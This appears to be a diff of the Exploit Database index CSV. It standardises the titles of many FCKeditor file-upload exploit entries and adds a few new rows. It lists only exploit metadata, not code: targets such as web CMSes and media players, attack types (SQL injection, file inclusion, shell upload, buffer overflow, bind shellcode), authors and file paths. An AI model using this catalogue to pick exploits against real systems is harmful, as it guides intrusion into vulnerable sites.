-11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
+11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0
 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
 11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
-12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
+12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
-12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
+12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
-12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
+12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
 12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
-12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
+12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
 12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
 12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
-12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
+12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
 12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
-12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
+12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
 14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
 12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
-12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
+12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
 12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
 12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
 12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
-13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
+13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
 13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
 13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
 13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
-13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
+13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
 13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
 13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
-13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
+13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
 13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
 13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
 13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
-14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
+14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
 15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
 15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
-15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
+15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
 15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02  - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
 15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
 15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
 15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
-15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
+15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
 15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
 15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
 15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
 15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
-15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
+15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
 15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
 15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
 15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
-15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
+15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
 15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
 15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
 15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
+15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
 15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
 15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
-15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
+15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
 15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
-15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
+15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
-17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
+17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 -  (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
-17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
+17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
-23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
+23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
-36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
+36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
 36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,DognÃ¦dis,php,webapps,0
@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
 37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
 37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
-37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
+37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
 37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
 37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
--- a/platforms/asp/webapps/23005.txt
+++ b/platforms/asp/webapps/23005.txt
